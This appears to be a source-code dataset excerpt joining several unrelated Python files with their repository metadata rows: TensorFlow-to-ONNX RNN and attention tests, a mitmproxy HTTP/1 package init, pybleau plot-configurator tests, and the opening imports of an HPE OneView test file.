x_val = np.stack([x_val] * batch_size)
attention_states = np.random.randn(batch_size, time_step, attn_size).astype('f')
def func(x):
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size, attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, x, dtype=tf.float32)
return tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": x_val}
input_names_with_port = ["input_1:0"]
output_names_with_port = ["output:0"]
output_names_with_port = ["output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_lstm_encoder(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, input_size).astype('f')
decoder_x_val = np.stack([decoder_x_val] * batch_size)
def func(encoder_x, decoder_x):
encoder_cell = LSTMCell(size)
output, attr_state = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
output_0 = tf.identity(output, name="output_0")
attention_states = output
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, decoder_x, dtype=tf.float32)
return output_0, tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output_0:0", "output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_gru_encoder(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, input_size).astype('f')
decoder_x_val = np.stack([decoder_x_val] * batch_size)
def func(encoder_x, decoder_x):
encoder_cell = GRUCell(size)
output, attr_state = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
_ = tf.identity(output, name="output_0")
attention_states = output
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = GRUCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, decoder_x, dtype=tf.float32)
return tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output_0:0", "output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_tf2()
def test_attention_wrapper_lstm_encoder_input_has_none_dim(self):
size = 5
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, input_size).astype('f')
decoder_x_val = np.stack([decoder_x_val] * batch_size)
def func(encoder_x, decoder_x):
encoder_cell = LSTMCell(size)
output, attr_state = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
_ = tf.identity(output, name="output_0")
attention_states = output
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
output, attr_state = dynamic_rnn(match_cell_fw, decoder_x, dtype=tf.float32)
return tf.identity(output, name="output"), tf.identity(attr_state.cell_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val}
input_names_with_port = ["input_1:0", "input_2:0"]
output_names_with_port = ["output_0:0", "output:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
@check_opset_min_version(8, "Scan")
@skip_tf2()
def test_multi_rnn_lstm(self, state_is_tuple=True):
units = 5
batch_size = 6
x_val = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]], dtype=np.float32)
x_val = np.stack([x_val] * batch_size)
def func(x):
initializer = init_ops.constant_initializer(0.5)
cell_0 = LSTMCell(units,
initializer=initializer,
state_is_tuple=state_is_tuple)
cell_1 = LSTMCell(units,
initializer=initializer,
state_is_tuple=state_is_tuple)
cell_2 = LSTMCell(units,
initializer=initializer,
state_is_tuple=state_is_tuple)
cells = MultiRNNCell([cell_0, cell_1, cell_2], state_is_tuple=state_is_tuple)
outputs, cell_state = dynamic_rnn(cells, x, dtype=tf.float32)
return tf.identity(outputs, name="output"), tf.identity(cell_state, name="cell_state")
input_names_with_port = ["input_1:0"]
feed_dict = {"input_1:0": x_val}
output_names_with_port = ["output:0", "cell_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, rtol=1e-06)
@check_opset_min_version(8, "Scan")
@check_tf_min_version("1.8")
@skip_opset(9, "ReverseSequence")
@skip_tf2()
@allow_missing_shapes("Missing RNN shape")
def test_bidrectional_attention_wrapper_lstm_encoder(self):
size = 30
time_step = 3
input_size = 4
attn_size = size
batch_size = 9
# shape [batch size, time step, size]
# attention_state: usually the output of an RNN encoder.
# This tensor should be shaped `[batch_size, max_time, ...]`
encoder_time_step = time_step
encoder_x_val = np.random.randn(encoder_time_step, input_size).astype('f')
encoder_x_val = np.stack([encoder_x_val] * batch_size)
decoder_time_step = 6
decoder_x_val = np.random.randn(decoder_time_step, batch_size, input_size).astype('f')
def func(encoder_x, decoder_x, seq_length):
encoder_cell = LSTMCell(size)
attention_states, _ = dynamic_rnn(encoder_cell, encoder_x, dtype=tf.float32)
# [9, 3, 30], [9, 30]
attention_mechanism = tf.contrib.seq2seq.BahdanauAttention(attn_size,
attention_states)
match_input_fn = lambda curr_input, state: tf.concat([curr_input, state], axis=-1)
cell = LSTMCell(size)
match_cell_fw = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
match_cell_bk = tf.contrib.seq2seq.AttentionWrapper(cell,
attention_mechanism,
attention_layer_size=attn_size,
cell_input_fn=match_input_fn,
output_attention=False)
(match_output_fw, match_output_bk), (match_state_fw, match_state_bk) = \
bidirectional_dynamic_rnn(cell_fw=match_cell_fw,
cell_bw=match_cell_bk,
inputs=decoder_x,
sequence_length=tf.identity(seq_length),
dtype=tf.float32,
time_major=True)
matched_output = tf.concat([match_output_fw, match_output_bk], axis=-1)
matched_state = tf.concat([match_state_fw.cell_state, match_state_bk.cell_state], -1)
return tf.identity(matched_output, name="output_0"), tf.identity(matched_state, name="final_state")
feed_dict = {"input_1:0": encoder_x_val, "input_2:0": decoder_x_val,
"input_3:0": np.array([6, 5, 4, 3, 2, 1, 2, 3, 6], dtype=np.int32)}
input_names_with_port = ["input_1:0", "input_2:0", "input_3:0"]
output_names_with_port = ["output_0:0", "final_state:0"]
self.run_test_case(func, feed_dict, input_names_with_port, output_names_with_port, 0.1)
class GatedGRUCell(RNNCell):
def __init__(self, hidden_dim, reuse=None):
super().__init__(self, _reuse=reuse)
self._num_units = hidden_dim
self._activation = tf.tanh
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def call(self, inputs, state):
# inputs shape: [batch size, time step, input size] = [1, 3, 2]
# num_units: 5
# W shape: [2, 3 * 5] = [2, 15]
# U shape: [5, 3 * 5] = [5, 15]
# b shape: [1, 3 * 5] = [1, 15]
# state shape: [batch size, state size] = [1, 5]
input_dim = inputs.get_shape()[-1]
assert input_dim is not None, "input dimension must be defined"
# W = tf.get_variable(name="W", shape=[input_dim, 3 * self._num_units], dtype=tf.float32)
W = np.arange(30.0, dtype=np.float32).reshape((2, 15))
# U = tf.get_variable(name='U', shape=[self._num_units, 3 * self._num_units], dtype=tf.float32)
U = np.arange(75.0, dtype=np.float32).reshape((5, 15))
# b = tf.get_variable(name='b', shape=[1, 3 * self._num_units], dtype=tf.float32)
b = np.arange(15.0, dtype=np.float32).reshape((1, 15))
xw = tf.split(tf.matmul(inputs, W) + b, 3, 1)
hu = tf.split(tf.matmul(state, U), 3, 1)
r = tf.sigmoid(xw[0] + hu[0])
z = tf.sigmoid(xw[1] + hu[1])
h1 = self._activation(xw[2] + r * hu[2])
next_h = h1 * (1 - z) + state * z
return next_h, next_h
if __name__ == '__main__':
unittest_main()
| 46.962353 | 119 | 0.584348 | 2,555 | 19,959 | 4.228571 | 0.08454 | 0.019993 | 0.049334 | 0.036931 | 0.802943 | 0.787764 | 0.745187 | 0.724084 | 0.719363 | 0.715383 | 0 | 0.029786 | 0.310336 | 19,959 | 424 | 120 | 47.073113 | 0.755104 | 0.078761 | 0 | 0.692073 | 0 | 0 | 0.047087 | 0 | 0 | 0 | 0 | 0 | 0.003049 | 1 | 0.073171 | false | 0 | 0.027439 | 0.006098 | 0.146341 | 0.003049 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
5de7a1ab9ad6ce3cc45b32937415c25c0fb99a65
| 546 |
py
|
Python
|
mitmproxy/net/http/http1/__init__.py
|
aarnaut/mitmproxy
|
a8b6f48374b28954f9d8fb5cabbc4fdcaebe9e3a
|
[
"MIT"
] | null | null | null |
mitmproxy/net/http/http1/__init__.py
|
aarnaut/mitmproxy
|
a8b6f48374b28954f9d8fb5cabbc4fdcaebe9e3a
|
[
"MIT"
] | null | null | null |
mitmproxy/net/http/http1/__init__.py
|
aarnaut/mitmproxy
|
a8b6f48374b28954f9d8fb5cabbc4fdcaebe9e3a
|
[
"MIT"
] | null | null | null |
from .read import (
read_request_head,
read_response_head,
connection_close,
expected_http_body_size,
validate_headers,
)
from .assemble import (
assemble_request, assemble_request_head,
assemble_response, assemble_response_head,
assemble_body,
)
__all__ = [
"read_request_head",
"read_response_head",
"connection_close",
"expected_http_body_size",
"validate_headers",
"assemble_request", "assemble_request_head",
"assemble_response", "assemble_response_head",
"assemble_body",
]
| 21.84 | 50 | 0.727106 | 59 | 546 | 6.118644 | 0.271186 | 0.121884 | 0.083102 | 0.105263 | 0.903047 | 0.903047 | 0.903047 | 0.903047 | 0.903047 | 0.903047 | 0 | 0 | 0.18315 | 546 | 24 | 51 | 22.75 | 0.809417 | 0 | 0 | 0 | 0 | 0 | 0.327839 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
b905b9044ea31f3964e2eca2dbedd8cd13ec51f5
| 16,884 |
py
|
Python
|
pybleau/app/plotting/tests/test_plot_config.py
|
KBIbiopharma/pybleau
|
5cdfce603ad29af874f74f0f527adc6b4c9066e8
|
[
"MIT"
] | 4 |
2020-02-27T22:38:29.000Z
|
2021-05-03T05:32:11.000Z
|
pybleau/app/plotting/tests/test_plot_config.py
|
KBIbiopharma/pybleau
|
5cdfce603ad29af874f74f0f527adc6b4c9066e8
|
[
"MIT"
] | 85 |
2020-02-04T21:57:14.000Z
|
2021-05-03T14:29:40.000Z
|
pybleau/app/plotting/tests/test_plot_config.py
|
KBIbiopharma/pybleau
|
5cdfce603ad29af874f74f0f527adc6b4c9066e8
|
[
"MIT"
] | 1 |
2020-02-20T00:45:09.000Z
|
2020-02-20T00:45:09.000Z
|
from __future__ import division
from unittest import skipIf, TestCase
import os
from pandas import DataFrame
import numpy as np
from numpy.testing import assert_array_equal
BACKEND_AVAILABLE = os.environ.get("ETS_TOOLKIT", "qt4") != "null"
if BACKEND_AVAILABLE:
from app_common.apptools.testing_utils import assert_obj_gui_works
from pybleau.app.plotting.plot_config import HeatmapPlotConfigurator, \
HEATMAP_PLOT_TYPE, HistogramPlotConfigurator, HIST_PLOT_TYPE, \
LinePlotConfigurator, BarPlotConfigurator, ScatterPlotConfigurator, \
SCATTER_PLOT_TYPE, CMAP_SCATTER_PLOT_TYPE, LINE_PLOT_TYPE, \
BAR_PLOT_TYPE
LEN = 16
TEST_DF = DataFrame({"a": [1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 3, 4],
"b": [1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4],
"c": [1, 2, 3, 4, 2, 3, 1, 1, 4, 4, 5, 6, 4, 4, 5, 6],
"d": list("ababcabcdabcdeab"),
"e": np.random.randn(LEN),
"f": range(LEN),
# Highly repetitive column to split the entire data into 2
"g": np.array(["0", "1"] * (LEN // 2)),
"h": np.array([0, 1] * (LEN // 2), dtype=bool),
})
class BasePlotConfig(object):
def test_creation_fails_if_no_df(self):
with self.assertRaises(ValueError):
config = self.configurator()
config.to_dict()
def test_bring_up(self):
obj = self.configurator(data_source=TEST_DF)
assert_obj_gui_works(obj)
# Assertion utilities -----------------------------------------------------
def assert_editor_options(self, editor):
editor_options = editor.values
if self.numerical_cols_only:
for col in editor_options:
if col != "index":
self.assertIn(TEST_DF[col].dtype, (np.int64, np.float64))
else:
self.assertEqual(set(editor_options),
set(TEST_DF.columns) | {"index"})
class BaseXYPlotConfig(BasePlotConfig):
def test_plot_basic(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b")
self.assertEqual(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
assert_array_equal(config_dict["x_arr"], TEST_DF["a"].values)
self.assertIn("y_arr", config_dict)
assert_array_equal(config_dict["y_arr"], TEST_DF["b"].values)
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b")
view_items = config._data_selection_items()
x_editor = view_items[0].content[0].editor
self.assert_editor_options(x_editor)
y_editor = view_items[1].content[0].editor
self.assert_editor_options(y_editor)
def test_plot_colored_by_str_col(self):
# Color by a column filled with boolean values
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
self.assertIn(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], dict)
d_values = TEST_DF["d"].unique()
self.assertEqual(set(config_dict["x_arr"].keys()), set(d_values))
for arr in config_dict["x_arr"].values():
self.assertIsInstance(arr, np.ndarray)
# For example:
assert_array_equal(config_dict["x_arr"]["c"], np.array([1, 4, 4]))
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], dict)
self.assertEqual(set(config_dict["y_arr"].keys()), set(d_values))
for arr in config_dict["y_arr"].values():
self.assertIsInstance(arr, np.ndarray)
# For example:
assert_array_equal(config_dict["y_arr"]["c"], np.array([2, 2, 3]))
def test_plot_colored_by_bool_col(self):
# Color by a column filled with boolean values
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="h")
self.assertIn(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], dict)
hue_values = set(TEST_DF["h"])
self.assertEqual(set(config_dict["x_arr"].keys()), hue_values)
assert_array_equal(config_dict["x_arr"][False], TEST_DF["a"][::2])
assert_array_equal(config_dict["x_arr"][True], TEST_DF["a"][1::2])
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], dict)
self.assertEqual(set(config_dict["y_arr"].keys()), hue_values)
assert_array_equal(config_dict["y_arr"][False], TEST_DF["b"][::2])
assert_array_equal(config_dict["y_arr"][True], TEST_DF["b"][1::2])
def test_plot_colored_by_NON_EXISTENT_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="NON-EXISTENT")
with self.assertRaises(KeyError):
config.to_dict()
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestScatterPlotConfig(TestCase, BaseXYPlotConfig):
def setUp(self):
self.configurator = ScatterPlotConfigurator
self.basic_type = SCATTER_PLOT_TYPE
self.numerical_cols_only = True
def test_plot_scatter_colored_by_int_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="c")
self.assertEqual(config.plot_type, CMAP_SCATTER_PLOT_TYPE)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], np.ndarray)
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], np.ndarray)
self.assertIn("z_arr", config_dict)
self.assertIsInstance(config_dict["z_arr"], np.ndarray)
def test_plot_scatter_colored_by_float_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="e")
self.assertEqual(config.plot_type, CMAP_SCATTER_PLOT_TYPE)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertIsInstance(config_dict["x_arr"], np.ndarray)
self.assertIn("y_arr", config_dict)
self.assertIsInstance(config_dict["y_arr"], np.ndarray)
self.assertIn("z_arr", config_dict)
self.assertIsInstance(config_dict["z_arr"], np.ndarray)
def test_style_colorize_by_float_changes_on_color_column_change(self):
""" The dtype of the column to colorize controls colorize_by_float.
"""
# Color by a string:
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
self.assertFalse(config.plot_style.colorize_by_float)
# Color by a float:
config.z_col_name = "e"
self.assertTrue(config.plot_style.colorize_by_float)
def test_scatter_data_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._data_selection_columns()
expected = config._numerical_columns
self.assertCountEqual(columns, expected)
def test_scatter_color_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._color_selection_columns()
expected = [""] + config._available_columns
self.assertCountEqual(columns, expected)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestLinePlotConfig(TestCase, BaseXYPlotConfig):
def setUp(self):
self.configurator = LinePlotConfigurator
self.basic_type = LINE_PLOT_TYPE
self.numerical_cols_only = True
def test_line_data_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._data_selection_columns()
expected = config._numerical_columns
self.assertCountEqual(columns, expected)
def test_line_color_selection_columns(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="d")
columns = config._color_selection_columns()
expected = [""] + config._available_columns
self.assertCountEqual(columns, expected)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestBarPlotConfig(TestCase, BaseXYPlotConfig):
def setUp(self):
self.configurator = BarPlotConfigurator
self.basic_type = BAR_PLOT_TYPE
self.numerical_cols_only = False
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b")
view_items = config._data_selection_items()
x_editor = view_items[0].content[3].content[0].content[0].editor
self.assert_editor_options(x_editor)
def test_melt_mode_no_effect(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True)
self.assertEqual(config.plot_type, self.basic_type)
# No columns to melt, so no transformation:
self.assertIs(config.data_source, TEST_DF)
self.assertIs(config.transformed_data, TEST_DF)
def test_melt_mode_with_melted_columns(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True,
columns_to_melt=["e", "f"])
self.assertIsNot(config.transformed_data, TEST_DF)
self.assertIs(config.data_source, TEST_DF)
# Pulling the x_arr forces a reset of the x_col_name
x_values = np.array(["e"]*LEN+["f"]*LEN)
assert_array_equal(config.x_arr, x_values)
self.assertEqual(config.x_col_name, "variable")
self.assertEqual(len(config.y_arr), 2 * LEN)
self.assertEqual(config.y_col_name, "value")
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
assert_array_equal(config_dict["x_arr"], x_values)
self.assertIn("y_arr", config_dict)
self.assertEqual(len(config_dict["y_arr"]), 2 * LEN)
def test_melt_mode_with_melted_columns_and_str_color(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True,
columns_to_melt=["e", "f"], z_col_name="g")
self.assertIsNot(config.transformed_data, TEST_DF)
self.assertIs(config.data_source, TEST_DF)
hue_values = TEST_DF["g"].unique()
# Pulling the x_arr forces a reset of the x_col_name
x_values = np.array(["e"] * (LEN // 2) + ["f"] * (LEN // 2))
self.assertEqual(set(config.x_arr.keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config.x_arr[key], x_values)
self.assertEqual(config.x_col_name, "variable")
for key in hue_values:
self.assertEqual(len(config.y_arr[key]), LEN)
self.assertEqual(config.y_col_name, "value")
self.assertIn("g", config.transformed_data.columns)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertEqual(set(config_dict["x_arr"].keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config_dict["x_arr"][key], x_values)
self.assertIn("y_arr", config_dict)
for key in hue_values:
self.assertEqual(len(config_dict["y_arr"][key]), LEN)
def test_melt_mode_with_melted_columns_and_bool_color(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True,
columns_to_melt=["e", "f"], z_col_name="h")
self.assertIsNot(config.transformed_data, TEST_DF)
self.assertIs(config.data_source, TEST_DF)
hue_values = TEST_DF["h"].unique()
# Pulling the x_arr forces a reset of the x_col_name
x_values = np.array(["e"] * (LEN // 2) + ["f"] * (LEN // 2))
self.assertEqual(set(config.x_arr.keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config.x_arr[key], x_values)
self.assertEqual(config.x_col_name, "variable")
for key in hue_values:
self.assertEqual(len(config.y_arr[key]), LEN)
self.assertEqual(config.y_col_name, "value")
self.assertIn("h", config.transformed_data.columns)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertEqual(set(config_dict["x_arr"].keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config_dict["x_arr"][key], x_values)
self.assertIn("y_arr", config_dict)
for key in hue_values:
self.assertEqual(len(config_dict["y_arr"][key]), LEN)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestHistogramPlotConfig(BasePlotConfig, TestCase):
def setUp(self):
self.configurator = HistogramPlotConfigurator
self.basic_type = HIST_PLOT_TYPE
self.numerical_cols_only = True
# Tests -------------------------------------------------------------------
def test_plot_basic(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a")
self.assertEqual(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
assert_array_equal(config_dict["x_arr"], TEST_DF["a"].values)
def test_plot_NON_EXISTENT_col(self):
config = self.configurator(data_source=TEST_DF,
x_col_name="NON-EXISTENT")
with self.assertRaises(KeyError):
config.to_dict()
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a")
view_items = config._data_selection_items()
x_editor = view_items[0].content[0].editor
self.assert_editor_options(x_editor)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestHeatmapPlotConfig(BasePlotConfig, TestCase):
def setUp(self):
self.configurator = HeatmapPlotConfigurator
self.basic_type = HEATMAP_PLOT_TYPE
self.numerical_cols_only = True
# Tests -------------------------------------------------------------------
def test_plot_basic(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="e")
self.assertEqual(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
def test_plot_colored_by_NON_EXISTENT_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="NON-EXISTENT")
with self.assertRaises(KeyError):
config.to_dict()
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
Passing non-numerical
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="e")
view_items = config._data_selection_items()
x_editor = view_items[0].content[0].editor
self.assert_editor_options(x_editor)
y_editor = view_items[1].content[0].editor
self.assert_editor_options(y_editor)
| 42.422111 | 79 | 0.636105 | 2,185 | 16,884 | 4.598169 | 0.088787 | 0.071663 | 0.039017 | 0.04459 | 0.826615 | 0.815368 | 0.785409 | 0.742013 | 0.724097 | 0.677914 | 0 | 0.007342 | 0.241708 | 16,884 | 397 | 80 | 42.528967 | 0.777396 | 0.060057 | 0 | 0.635135 | 0 | 0 | 0.036625 | 0 | 0 | 0 | 0 | 0 | 0.391892 | 1 | 0.10473 | false | 0 | 0.027027 | 0 | 0.155405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
5d173dba73e014674031b329494a05e8bf83b546
| 24 |
py
|
Python
|
vel/notebook/__init__.py
|
tigerwlin/vel
|
00e4fbb7b612e888e2cbb5d8455146664638cd0b
|
[
"MIT"
] | 273 |
2018-09-01T08:54:34.000Z
|
2022-02-02T13:22:51.000Z
|
vel/notebook/__init__.py
|
tigerwlin/vel
|
00e4fbb7b612e888e2cbb5d8455146664638cd0b
|
[
"MIT"
] | 47 |
2018-08-17T11:27:08.000Z
|
2022-03-11T23:26:55.000Z
|
vel/notebook/__init__.py
|
tigerwlin/vel
|
00e4fbb7b612e888e2cbb5d8455146664638cd0b
|
[
"MIT"
] | 37 |
2018-10-11T22:56:57.000Z
|
2020-10-06T19:53:05.000Z
|
from .loader import load
| 24 | 24 | 0.833333 | 4 | 24 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
5d6fd80c1e9176894348ae0d83e6981dbb3ecb3a
| 103,544 |
py
|
Python
|
tests/unit/resources/test_resource.py
|
gzecchi/oneview-python
|
949bc67ca3eaed324a6dc058620145d9e067e25b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/test_resource.py
|
gzecchi/oneview-python
|
949bc67ca3eaed324a6dc058620145d9e067e25b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/test_resource.py
|
gzecchi/oneview-python
|
949bc67ca3eaed324a6dc058620145d9e067e25b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import io
import unittest
import mock
from mock import call
from tests.test_utils import mock_builtin
